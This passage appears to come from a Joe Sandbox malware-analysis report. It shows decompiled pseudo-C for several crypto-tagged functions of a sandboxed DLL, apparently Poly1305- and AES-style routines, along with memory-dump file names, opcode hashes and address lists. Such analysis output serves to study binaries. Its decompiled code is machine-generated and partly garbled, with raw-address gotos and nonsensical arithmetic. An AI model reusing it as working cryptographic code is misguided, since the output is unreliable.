				 *((intOrPtr*)(_t241 + 0x12)) = r14b;
				 *((intOrPtr*)(_t241 + 0x13)) = sil;
				 *((intOrPtr*)(_t241 + 0x15)) = dil;
				 *((intOrPtr*)(_t241 + 0x16)) = r11b;
				 *(_t241 + 0x17) = _t190;
				 *((intOrPtr*)(_t241 + 0x18)) = r10b;
				 *((intOrPtr*)(_t241 + 0x19)) = r9b;
				 *((intOrPtr*)(_t241 + 0x1a)) = r8b;
				 *(_t241 + 0x1b) = _t210;
				 *((intOrPtr*)(_t241 + 0x1c)) = bpl;
				 *(_t241 + 0x1d) = _t182;
				return _t182;
			}

0x7fef30ec8c0
0x7fef30ec8d1
0x7fef30ec8d5
0x7fef30ec8d8
0x7fef30ec8dc
0x7fef30ec8e3
0x7fef30ec8ef
0x7fef30ec8f6
0x7fef30ec8f9
0x7fef30ec8fd
0x7fef30ec901
0x7fef30ec919
0x7fef30ec922
0x7fef30ec934
0x7fef30ec937
0x7fef30ec949
0x7fef30ec94c
0x7fef30ec95e
0x7fef30ec961
0x7fef30ec975
0x7fef30ec987
0x7fef30ec999
0x7fef30ec9ab
0x7fef30ec9b3
0x7fef30ec9bf
0x7fef30ec9c1
0x7fef30ec9ca
0x7fef30ec9d4
0x7fef30ec9d7
0x7fef30ec9df
0x7fef30ec9e5
0x7fef30ec9ee
0x7fef30ec9f5
0x7fef30ec9fb
0x7fef30eca02
0x7fef30eca09
0x7fef30eca10
0x7fef30eca13
0x7fef30eca34
0x7fef30eca37
0x7fef30eca41
0x7fef30eca4d
0x7fef30eca53
0x7fef30eca5f
0x7fef30eca63
0x7fef30eca69
0x7fef30eca72
0x7fef30eca75
0x7fef30eca78
0x7fef30eca7c
0x7fef30eca83
0x7fef30eca95
0x7fef30eca99
0x7fef30ecaa9
0x7fef30ecaac
0x7fef30ecab3
0x7fef30ecaba
0x7fef30ecac1
0x7fef30ecac5
0x7fef30ecac9
0x7fef30ecacc
0x7fef30ecad3
0x7fef30ecada
0x7fef30ecade
0x7fef30ecae2
0x7fef30ecae5
0x7fef30ecae9
0x7fef30ecaec
0x7fef30ecaf3
0x7fef30ecaf9
0x7fef30ecafe
0x7fef30ecb01
0x7fef30ecb05
0x7fef30ecb08
0x7fef30ecb0f
0x7fef30ecb12
0x7fef30ecb15
0x7fef30ecb1a
0x7fef30ecb1e
0x7fef30ecb2a
0x7fef30ecb2d
0x7fef30ecb3e
0x7fef30ecb42
0x7fef30ecb45
0x7fef30ecb4a
0x7fef30ecb52
0x7fef30ecb56
0x7fef30ecb59
0x7fef30ecb5d
0x7fef30ecb64
0x7fef30ecb69
0x7fef30ecb6d
0x7fef30ecb72
0x7fef30ecb76
0x7fef30ecb7b
0x7fef30ecb7f
0x7fef30ecb84
0x7fef30ecb88
0x7fef30ecb90
0x7fef30ecb94
0x7fef30ecb99
0x7fef30ecb9d
0x7fef30ecba5
0x7fef30ecbab
0x7fef30ecbb0
0x7fef30ecbb4
0x7fef30ecbb9
0x7fef30ecbbd
0x7fef30ecbc2
0x7fef30ecbc6
0x7fef30ecbcb
0x7fef30ecbcf
0x7fef30ecbd4
0x7fef30ecbd8
0x7fef30ecbe0
0x7fef30ecbe6
0x7fef30ecbeb
0x7fef30ecbfb
0x7fef30ecbff
0x7fef30ecc03
0x7fef30ecc0a
0x7fef30ecc13
0x7fef30ecc2d
0x7fef30ecc30
0x7fef30ecc34
0x7fef30ecc37
0x7fef30ecc41
0x7fef30ecc44
0x7fef30ecc47
0x7fef30ecc4e
0x7fef30ecc56
0x7fef30ecc5a
0x7fef30ecc61
0x7fef30ecc66
0x7fef30ecc69
0x7fef30ecc6d
0x7fef30ecc71
0x7fef30ecc79
0x7fef30ecc7e
0x7fef30ecc85
0x7fef30ecc90
0x7fef30ecc94
0x7fef30ecc98
0x7fef30ecc9c
0x7fef30ecca0
0x7fef30ecca4
0x7fef30ecca8
0x7fef30eccac
0x7fef30eccb0
0x7fef30eccb4
0x7fef30eccb8
0x7fef30eccbc
0x7fef30eccc0
0x7fef30eccc4
0x7fef30eccd8

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcf4a46fe3b14b8166f67fa5c77ea0407f75e7f2231b09dcb698643bbc0d72b6
Instruction ID: 2cd1b87b66f64d219f4ee08a0b3ca426307f011e55438a70cfabb7be5d411a42
Opcode Fuzzy Hash: fcf4a46fe3b14b8166f67fa5c77ea0407f75e7f2231b09dcb698643bbc0d72b6
Instruction Fuzzy Hash: 02A1D1B36282C88FC351CF2CA80450E7FE8F7A2765B494358EBA2D3B95D638D955CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E84E0 Relevance: .3, Instructions: 257
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E000007FE7FEF30E84E0(signed int __rbx, long long __rcx, signed int __rdx, signed int __r8, signed int __r11) {
				unsigned int _t120;
				unsigned int _t124;
				signed int _t127;
				signed int _t128;
				unsigned int _t130;
				unsigned int _t132;
				signed long long _t152;
				void* _t155;
				signed long long _t156;
				signed long long _t161;
				signed long long _t186;
				signed long long _t211;
				signed long long _t214;
				signed long long _t215;
				intOrPtr _t220;
				void* _t223;
				signed long long _t224;
				signed long long _t229;
				long long _t238;
				signed int* _t241;
				signed int* _t244;
				signed int* _t246;
				signed long long _t248;
				signed long long _t251;
				signed int* _t255;
				intOrPtr* _t256;
				signed long long _t260;
				signed long long _t261;

				 *((long long*)(_t223 + 0x18)) = __rbx;
				_push(_t211);
				_push(_t248);
				_push(_t251);
				_t224 = _t223 - 0x80;
				_t152 =  *0xf319c428; // 0x2fa980d671f5
				 *(_t224 + 0x78) = _t152 ^ _t224;
				 *(_t224 + 0x50) = __rdx;
				 *((long long*)(_t224 + 0x58)) = __rcx;
				_t214 = __rcx + 0x2c;
				_t255 = __rcx + 0x30;
				_t260 = __rcx + 0x34;
				if (__r8 - 0x10 >= 0) goto 0xf30e87c5;
				 *(_t224 + 0x48) = _t260;
				 *(_t224 + 0x40) = _t255;
				 *(_t224 + 0x38) = _t214;
				 *(_t224 + 0x28) = __rcx + 0x28;
				 *((long long*)(_t224 + 0x30)) = __rcx + 0x24;
				if (__r8 == 0) goto 0xf30e8859;
				if (__r8 == 0) goto 0xf30e857a;
				E000007FE7FEF30F1E10();
				_t229 =  *((intOrPtr*)(_t224 + 0x30));
				_t244 =  *(_t224 + 0x28);
				 *((char*)(_t224 + __r8 + 0x68)) = 1;
				_t155 = __r8 + 1;
				if (_t155 - 0x10 >= 0) goto 0xf30e859e;
				 *((char*)(_t224 + _t155 + 0x68)) = 0;
				_t156 = _t155 + 1;
				if (_t156 - 0x10 < 0) goto 0xf30e8590;
				_t120 =  *(_t224 + 0x68);
				_t132 =  *(_t224 + 0x6c);
				 *_t229 =  *_t229 + (_t120 & 0x03ffffff);
				r8d =  *(_t224 + 0x70);
				 *((long long*)(_t224 + 0x60)) = 0;
				 *_t244 =  *_t244 + ((_t120 >> 0x0000001a | _t132 << 0x00000006) & 0x03ffffff);
				_t124 =  *(_t224 + 0x74);
				r9d =  *_t244;
				r8d = r8d >> 0xe;
				 *_t214 =  *_t214 + ((r8d << 0x0000000c | _t132 >> 0x00000014) & 0x03ffffff);
				r11d =  *_t214;
				 *_t255 =  *_t255 + ((_t124 << 0x00000012 | r8d) & 0x03ffffff);
				 *_t260 =  *_t260 + (_t124 >> 8);
				 *(_t224 + 0x20) =  *_t260;
				_t256 =  *((intOrPtr*)(_t224 + 0x58));
				r13d =  *_t255;
				r10d =  *((intOrPtr*)(_t256 + 0x20));
				r9d =  *(_t256 + 0x1c);
				r8d =  *(_t256 + 0x18);
				r15d =  *_t256;
				r12d = r11d;
				r11d =  *(_t256 + 0xc);
				_t161 =  *((intOrPtr*)(_t224 + 0x30));
				r14d =  *(_t256 + 0x14);
				r14d = r14d & 0x03ffffff;
				 *_t161 = r14d;
				_t162 = _t161 * _t251;
				 *( *(_t224 + 0x28)) = r8d & 0x03ffffff;
				_t127 = r8d;
				r8d =  *(_t224 + 0x20);
				 *( *(_t224 + 0x38)) = _t127 & 0x03ffffff;
				_t241 =  *(_t224 + 0x50);
				_t246 =  *(_t224 + 0x28);
				_t261 =  *(_t224 + 0x48);
				 *( *(_t224 + 0x40)) = _t127 & 0x03ffffff;
				_t186 =  *((intOrPtr*)(_t224 + 0x58));
				_t128 =  *(_t186 + 0x10);
				_t215 =  *(_t224 + 0x38);
				_t220 =  *((intOrPtr*)(_t224 + 0x60));
				_t238 =  *((intOrPtr*)(_t224 + 0x30));
				 *_t261 = _t128 & 0x03ffffff;
				 *_t238 = _t128 + _t256 + (_t186 * _t214 + _t161 * _t251 * _t248 * _t211 * _t260 * _t251 * __rbx * _t211 * _t260 * __r11 * __rbx * _t211 * _t260 + __r8 * __r11 + _t248 * __rbx + _t251 * _t211 + (_t229 * (_t224 + 0x68) + _t162 + _t161 * _t251 * _t248 + _t161 * _t251 * _t248 * _t211 + _t161 * _t251 * _t248 * _t211 * _t260 + (__rdx * _t156 + _t156 * _t251 + _t156 * _t251 * _t248 + _t156 * _t251 * _t248 * __r8 + _t156 * _t251 * _t248 * __r8 * _t260 >> 0x1a) >> 0x1a) * _t260 >> 0x1a) * 4;
				if (_t220 - 0x10 < 0) goto 0xf30e8534;
				_t130 = _t241[1];
				r11d = _t241[2];
				 *(_t224 + 0x50) =  &(_t241[4]);
				r9d =  *_t241;
				r9d = r9d >> 0x1a;
				r9d = r9d | _t130 << 0x00000006;
				r11d = r11d << 0xc;
				r11d = r11d | _t130 >> 0x00000014;
				r9d = r9d & 0x03ffffff;
				r9d = r9d +  *_t246;
				r11d = r11d & 0x03ffffff;
				r11d = r11d +  *_t215;
				asm("bts ebx, 0x18");
				 *((long long*)(_t224 + 0x60)) = _t220 - 0x10;
				 *((long long*)(_t224 + 0x30)) = _t238;
				 *(_t224 + 0x28) = _t246;
				 *(_t224 + 0x38) = _t215;
				 *(_t224 + 0x48) = _t261;
				goto 0xf30e8610;
				return E000007FE7FEF30F1360(((_t241[3] << 0x00000012 | _t241[2] >> 0x0000000e) & 0x03ffffff) +  *( *(_t224 + 0x40)), _t130 >> 0x14,  *(_t224 + 0x78) ^ _t224);
			}

0x7fef30e84e0
0x7fef30e84e7
0x7fef30e84e8
0x7fef30e84ea
0x7fef30e84f0
0x7fef30e84f7
0x7fef30e8501
0x7fef30e8509
0x7fef30e850e
0x7fef30e851e
0x7fef30e8522
0x7fef30e8526
0x7fef30e852e
0x7fef30e8534
0x7fef30e8539
0x7fef30e853e
0x7fef30e8543
0x7fef30e8548
0x7fef30e8550
0x7fef30e855b
0x7fef30e8568
0x7fef30e856d
0x7fef30e8575
0x7fef30e857a
0x7fef30e857f
0x7fef30e8586
0x7fef30e8590
0x7fef30e8595
0x7fef30e859c
0x7fef30e859e
0x7fef30e85a4
0x7fef30e85ad
0x7fef30e85b5
0x7fef30e85cb
0x7fef30e85d4
0x7fef30e85da
0x7fef30e85de
0x7fef30e85e6
0x7fef30e85ef
0x7fef30e85f3
0x7fef30e8604
0x7fef30e8607
0x7fef30e8610
0x7fef30e8614
0x7fef30e8619
0x7fef30e8623
0x7fef30e8627
0x7fef30e862b
0x7fef30e862f
0x7fef30e8636
0x7fef30e8639
0x7fef30e867d
0x7fef30e8682
0x7fef30e8689
0x7fef30e8690
0x7fef30e8696
0x7fef30e86cd
0x7fef30e86d7
0x7fef30e86da
0x7fef30e8715
0x7fef30e872c
0x7fef30e8731
0x7fef30e875e
0x7fef30e8771
0x7fef30e8773
0x7fef30e877a
0x7fef30e8781
0x7fef30e878c
0x7fef30e879a
0x7fef30e87aa
0x7fef30e87b8
0x7fef30e87bf
0x7fef30e87c5
0x7fef30e87d7
0x7fef30e87e4
0x7fef30e87e9
0x7fef30e87ec
0x7fef30e87f6
0x7fef30e87f9
0x7fef30e8805
0x7fef30e880b
0x7fef30e8812
0x7fef30e8815
0x7fef30e881c
0x7fef30e881f
0x7fef30e882b
0x7fef30e8835
0x7fef30e8840
0x7fef30e8845
0x7fef30e884f
0x7fef30e8854
0x7fef30e8880

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e799f7f7ccfacbc10219111ca113d937f0843cc341dce59da127b447c01a0598
Instruction ID: d92c20c952db1c8b4fd129fd2eaad876811052c3af68a8f21974e3eac9777812
Opcode Fuzzy Hash: e799f7f7ccfacbc10219111ca113d937f0843cc341dce59da127b447c01a0598
Instruction Fuzzy Hash: E3918B737147808BCB58CF0DB801A19B7A5F788B94F145626EF9D87BA5EA3CE911CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E7810 Relevance: .2, Instructions: 233
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30E7810(void* __eax, signed int* __rcx, signed int* _a8, signed int _a16, signed int _a24, signed int _a32) {
				signed int _v88;
				signed int _v96;
				signed int _v104;
				signed int _v112;
				signed long long _v120;
				signed int _v128;
				signed int _v136;
				signed long long _v144;
				signed int _v152;
				signed int _v160;
				signed int _v168;
				signed int _v176;
				signed int _v184;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				signed long long _t72;
				signed long long _t76;
				signed long long _t78;
				signed long long _t83;
				signed long long _t87;
				signed long long _t90;
				signed long long _t96;
				signed long long _t100;
				signed long long _t102;
				signed long long _t104;
				signed long long _t107;
				signed long long _t109;
				signed long long _t111;
				signed long long _t115;
				signed long long _t119;
				signed long long _t128;
				signed long long _t131;
				signed long long _t137;
				signed long long _t139;
				signed long long _t141;
				signed long long _t143;
				signed long long _t144;
				signed long long _t147;
				signed long long _t148;
				signed long long _t152;
				signed long long _t154;
				signed long long _t155;
				signed long long _t157;
				signed long long _t159;
				void* _t160;
				signed int* _t161;
				signed long long _t163;
				signed long long _t165;
				signed long long _t167;
				signed long long _t169;
				signed long long _t172;
				signed long long _t173;
				signed long long _t179;
				signed long long _t185;
				signed long long _t188;
				signed long long _t191;
				signed long long _t196;
				signed long long _t197;
				signed long long _t199;
				signed long long _t201;
				signed long long _t204;
				signed long long _t206;
				signed long long _t209;
				signed long long _t213;
				signed long long _t215;
				signed long long _t216;
				signed long long _t222;
				signed long long _t225;
				signed long long* _t226;
				signed long long _t228;
				signed long long _t230;
				signed long long _t231;
				signed long long _t235;
				signed long long _t239;
				signed long long _t240;
				signed long long _t243;
				signed long long _t245;
				signed long long _t247;
				signed long long _t248;
				signed long long _t250;
				signed long long _t253;
				signed long long _t256;
				signed long long _t258;

				_a8 = __rcx;
				_t161 = _t160 - 0x98;
				_t144 = __rcx[0xe];
				_t72 = __rcx[8];
				_t163 = __rcx[4];
				_t245 =  *__rcx;
				_t213 = _t163 ^ _t72;
				_t196 = __rcx[2] ^ _t144;
				_t107 = __rcx[0xc] ^ __rcx[0xa];
				_t100 = _t72 ^ _t144;
				_v208 = _t213;
				_t228 = _t163 ^ _t144;
				_a24 = _t196;
				_t197 = _t196 ^ _t213;
				 *_t161 = _t228;
				_v200 = _t100;
				_t157 = _t107 ^ _t245;
				_v112 = _t197;
				_v168 = _t157;
				_t215 = _t197 ^ __rcx[6];
				_t250 = _t157 ^ __rcx[2];
				_v176 = _t157 ^ _t72;
				_v184 = _t157 ^ _t144;
				_t152 = _t250 ^ _t228;
				_v152 = _t250;
				_v160 = _t152;
				_t216 = _t215 ^ __rcx[0xc];
				_t76 = _t215 ^ _t163;
				_v136 = _t76;
				_t165 = _t76 ^ _t107;
				_t179 = _t76 ^ _t245;
				_v192 = _t165;
				_v96 = _t179;
				_t128 = _t216 ^ _t100;
				_v128 = _t128;
				_t102 = _t128 ^ _t107;
				_t239 = _t128 ^ _t165;
				_t109 = _t76 & _t197;
				_t78 = _t128 & _v200;
				_t167 = _t165 &  *_t161 ^ _t78;
				_t131 = _t239 & _v208 ^ _t78;
				_t199 = _t102 & _a24;
				_t83 = _t179 & _t152 ^ _t131 ^ _t109 ^ _t216;
				_t230 = _t128 ^ _t245;
				_t185 = _v176 & _t245 ^ _t167 ^ _t109 ^ _v192 ^  *_t161;
				_t222 = _t250 & _t157 ^ _t131 ^ _t199 ^ _t102 ^ _a24;
				_t137 = _t230 & _v184 ^ _t167 ^ _t199 ^ _t102 ^ _t144;
				_t169 = _t185 ^ _t83;
				_t201 = _t222 & _t83;
				_t111 = _t201 ^ _t137;
				_t204 = (_t201 ^ _t185) & (_t137 ^ _t222) ^ _t137;
				_t147 = _t111 & _t169 ^ _t185;
				_v88 = _t204;
				_a32 = _t147;
				_t253 = (_t204 ^ _t111) & _t137;
				_t139 = _t204 ^ _t147;
				_a16 = _t139;
				_t188 = _t253 ^ _t204 ^ _t222;
				_t256 = (_t253 ^ _t111) & _t147 ^ _t169;
				_v104 = _t188;
				_t87 = _t256 ^ _t188;
				_v144 = _t188 ^ _t204;
				_v120 = _t87;
				_t247 = _t139 ^ _t87;
				_t154 = _t256 ^ _t147;
				_t148 = _t147 & _t230;
				_t231 = _a16;
				_t248 = _t247 & _v208;
				_t159 = _t204 &  *_a8;
				_t141 = _t247 & _t239;
				_t155 = _t154 & _a24;
				_t115 = _t154 & _t102;
				_t206 = _t256 & _v168;
				_t225 = _t231 & _v200 ^ _t248;
				_t240 = _v144;
				_t258 = _t256 & _v152 ^ _t148;
				_t104 = _t188 & _v160;
				_t90 = _t225 ^ _t206;
				_t172 = _t240 & _v136 ^ _t115;
				_t191 = _t172 ^ _t155 ^ _t159;
				_a16 = _t231 & _v128 ^ _t141 ^ _t115;
				_t235 = _v120;
				_t243 = _t240 & _v112 ^ _t90 ^ _t104;
				_t119 = _t235 & _v192 ^ _t90 ^ _t141;
				_t143 = _a16 ^ _t206;
				_a32 = _a32 & _v184 ^ _t119 ^ _t191;
				_t209 = _v104 & _v96 ^ _t243;
				_t226 = _a8;
				_t96 = _t209 ^ _t172;
				_t173 = _a32;
				_t226[1] =  !_t119 ^ _t258 ^ _t155;
				_t226[4] = _t96;
				 *_t226 =  !(_t191 ^ _t225) ^ _t258;
				_t226[3] = _t209 ^ _t148 ^ _t159;
				_t226[2] = _v88 & _v176 ^ _t173 ^ _t104;
				_t226[5] =  !(_t173 ^ _t143) ^ _t235 &  *_t161 ^ _t248;
				_t226[7] = _t243 ^ _a16;
				_t226[6] =  !_t96 ^ _t143;
				return __eax;
			}

0x7fef30e7810
0x7fef30e7821
0x7fef30e7828
0x7fef30e782f
0x7fef30e7833
0x7fef30e783a
0x7fef30e7844
0x7fef30e784b
0x7fef30e784e
0x7fef30e7852
0x7fef30e7855
0x7fef30e785d
0x7fef30e7860
0x7fef30e7868
0x7fef30e786b
0x7fef30e7872
0x7fef30e7877
0x7fef30e787a
0x7fef30e7882
0x7fef30e7887
0x7fef30e7894
0x7fef30e789e
0x7fef30e78a3
0x7fef30e78ab
0x7fef30e78ae
0x7fef30e78b6
0x7fef30e78bb
0x7fef30e78bf
0x7fef30e78c5
0x7fef30e78cd
0x7fef30e78d0
0x7fef30e78d3
0x7fef30e78d8
0x7fef30e78e0
0x7fef30e78e6
0x7fef30e78ee
0x7fef30e78f4
0x7fef30e78fb
0x7fef30e7904
0x7fef30e7911
0x7fef30e7914
0x7fef30e791a
0x7fef30e793c
0x7fef30e7944
0x7fef30e7947
0x7fef30e7965
0x7fef30e7976
0x7fef30e7979
0x7fef30e797f
0x7fef30e798b
0x7fef30e7997
0x7fef30e799d
0x7fef30e79a0
0x7fef30e79ab
0x7fef30e79b9
0x7fef30e79c2
0x7fef30e79c8
0x7fef30e79d6
0x7fef30e79d9
0x7fef30e79df
0x7fef30e79ea
0x7fef30e79ed
0x7fef30e79f5
0x7fef30e79fa
0x7fef30e7a08
0x7fef30e7a0b
0x7fef30e7a11
0x7fef30e7a1c
0x7fef30e7a24
0x7fef30e7a27
0x7fef30e7a32
0x7fef30e7a3a
0x7fef30e7a3d
0x7fef30e7a4a
0x7fef30e7a55
0x7fef30e7a5a
0x7fef30e7a5d
0x7fef30e7a6a
0x7fef30e7a6d
0x7fef30e7a79
0x7fef30e7a87
0x7fef30e7a8f
0x7fef30e7a94
0x7fef30e7ab3
0x7fef30e7ac4
0x7fef30e7ada
0x7fef30e7ae5
0x7fef30e7ae8
0x7fef30e7af3
0x7fef30e7af9
0x7fef30e7b07
0x7fef30e7b1e
0x7fef30e7b25
0x7fef30e7b2b
0x7fef30e7b38
0x7fef30e7b3f
0x7fef30e7b4e
0x7fef30e7b52
0x7fef30e7b69

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e647452dd0d0abe0f3840422dfcdf306c9bc95e2336d33cf2db9780188735182
Instruction ID: e6b800be92fe3e671c605ecc385604264c97b06a13de6e6a78fa28dda0845f57
Opcode Fuzzy Hash: e647452dd0d0abe0f3840422dfcdf306c9bc95e2336d33cf2db9780188735182
Instruction Fuzzy Hash: 2A81A3A3318B9482E610CFB1B960A9BB7A5F78DBD4F11A426EE8D57B18DE3CC451D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E7100 Relevance: .2, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30E7100(void* __eax, long long __rcx, void* _a8, signed long long _a16, signed long long _a24, signed long long _a32) {
				signed long long _t96;
				signed long long _t101;
				signed long long _t103;
				signed long long _t163;
				signed long long _t166;
				signed long long _t168;
				signed long long _t173;
				signed long long _t178;
				signed long long* _t179;
				signed long long _t184;
				signed long long _t186;
				signed long long _t191;
				signed long long _t192;
				signed long long _t193;
				signed long long _t194;
				signed long long _t199;
				signed long long _t200;
				signed long long _t201;
				signed long long _t206;
				signed long long _t207;
				signed long long _t212;
				signed long long _t214;
				signed long long _t216;
				signed long long _t218;
				signed long long _t220;

				_a8 = __rcx;
				_t163 =  *((intOrPtr*)(__rcx));
				_t186 =  *((intOrPtr*)(__rcx + 8));
				_t194 =  *((intOrPtr*)(__rcx + 0x10));
				_t201 =  *((intOrPtr*)(__rcx + 0x18));
				_t207 =  *((intOrPtr*)(__rcx + 0x20));
				_t96 =  *((intOrPtr*)(__rcx + 0x28));
				_t168 =  *((intOrPtr*)(__rcx + 0x30));
				_t103 =  *((intOrPtr*)(__rcx + 0x38));
				_t178 = (_t163 << 0x0000000c ^ _t163 >> 0x00000004) & 0x0fff0fff ^ _t163 << 0x0000000c;
				_t218 = _t178 ^ _t163;
				_t184 = (_t186 << 0x0000000c ^ _t186 >> 0x00000004) & 0x0fff0fff ^ _t186 << 0x0000000c;
				_t220 = _t184 ^ _t186;
				_t191 = (_t194 << 0x0000000c ^ _t194 >> 0x00000004) & 0x0fff0fff ^ _t194 << 0x0000000c;
				_t214 = _t191 ^ _t194;
				_t199 = (_t201 << 0x0000000c ^ _t201 >> 0x00000004) & 0x0fff0fff ^ _t201 << 0x0000000c;
				_t216 = _t199 ^ _t201;
				_t206 = (_t207 << 0x0000000c ^ _t207 >> 0x00000004) & 0x0fff0fff ^ _t207 << 0x0000000c;
				_a16 = _t206 ^ _t207;
				_t212 = (_t96 << 0x0000000c ^ _t96 >> 0x00000004) & 0x0fff0fff ^ _t96 << 0x0000000c;
				_a24 = _t212 ^ _t96;
				_t101 = (_t168 << 0x0000000c ^ _t168 >> 0x00000004) & 0x0fff0fff ^ _t168 << 0x0000000c;
				_a32 = _t101 ^ _t168;
				_t173 = (_t103 << 0x0000000c ^ _t103 >> 0x00000004) & 0x0fff0fff ^ _t103 << 0x0000000c;
				_t166 = _t173 ^ _t103;
				_t179 = _a8;
				 *_t179 = (_t218 >> 0x00000008 ^ _t218 << 0x00000008) & 0x00ff00ff ^ _t218 << 0x00000008 ^ _t166 ^ _t178;
				_t179[1] = (_t220 >> 0x00000008 ^ _t220 << 0x00000008) & 0x00ff00ff ^ _t220 << 0x00000008 ^ _t166 ^ _t184 ^ _t218;
				_t192 = _a16;
				_t179[2] = (_t214 >> 0x00000008 ^ _t214 << 0x00000008) & 0x00ff00ff ^ _t214 << 0x00000008 ^ _t191 ^ _t220;
				_t179[3] = (_t216 >> 0x00000008 ^ _t216 << 0x00000008) & 0x00ff00ff ^ _t216 << 0x00000008 ^ _t166 ^ _t199 ^ _t214;
				_t200 = _a24;
				_t179[4] = (_t192 >> 0x00000008 ^ _t192 << 0x00000008) & 0x00ff00ff ^ _t192 << 0x00000008 ^ _t166 ^ _t206 ^ _t216;
				_t193 = _a32;
				_t179[5] = (_t200 >> 0x00000008 ^ _t200 << 0x00000008) & 0x00ff00ff ^ _t200 << 0x00000008 ^ _t212 ^ _t192;
				_t179[6] = (_t193 >> 0x00000008 ^ _t193 << 0x00000008) & 0x00ff00ff ^ _t193 << 0x00000008 ^ _t101 ^ _t200;
				_t179[7] = (_t166 >> 0x00000008 ^ _t166 << 0x00000008) & 0x00ff00ff ^ _t166 << 0x00000008 ^ _t173 ^ _t193;
				return __eax;
			}

0x7fef30e7100
0x7fef30e7111
0x7fef30e7114
0x7fef30e711b
0x7fef30e7122
0x7fef30e7129
0x7fef30e712d
0x7fef30e7131
0x7fef30e7135
0x7fef30e715c
0x7fef30e716c
0x7fef30e7183
0x7fef30e7190
0x7fef30e71a7
0x7fef30e71b4
0x7fef30e71cb
0x7fef30e71d8
0x7fef30e71ef
0x7fef30e71fb
0x7fef30e7218
0x7fef30e7224
0x7fef30e7241
0x7fef30e724d
0x7fef30e726a
0x7fef30e7277
0x7fef30e72a8
0x7fef30e72ad
0x7fef30e72eb
0x7fef30e7310
0x7fef30e7318
0x7fef30e7343
0x7fef30e7354
0x7fef30e7373
0x7fef30e7394
0x7fef30e7399
0x7fef30e73c8
0x7fef30e73e6
0x7fef30e73f6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce0ba4e35e218c06a58a1cd762156bce113e5ef3a3c6aa04e7516b5a4d515df
Instruction ID: 4b9b5768264cff2308f8fc68f488fd7966dac2aaacb78a914f3130e940553421
Opcode Fuzzy Hash: bce0ba4e35e218c06a58a1cd762156bce113e5ef3a3c6aa04e7516b5a4d515df
Instruction Fuzzy Hash: 7F516C9272579C0B6E98DBA73D366B75295E788FD6358A03ADF6E57700DD3CE201C200

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF309ABD0 Relevance: .2, Instructions: 222
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E000007FE7FEF309ABD0(void* __eax, signed int __edx, long long __rax, long long __rcx, signed short* __rdx, signed int __r8) {
				signed char _t53;
				signed char _t55;
				short _t58;
				signed char _t62;
				signed char _t68;
				signed char _t70;
				signed char _t72;
				signed char _t76;
				signed char _t78;
				signed short _t82;
				signed short _t83;
				signed int _t88;
				void* _t116;
				long long _t118;
				intOrPtr _t119;
				signed short* _t143;
				long long* _t147;
				void* _t148;
				intOrPtr _t154;
				signed short* _t155;

				_t147 = _t148 + 0x50;
				 *_t147 = 0xfffffffe;
				_t88 = __r8;
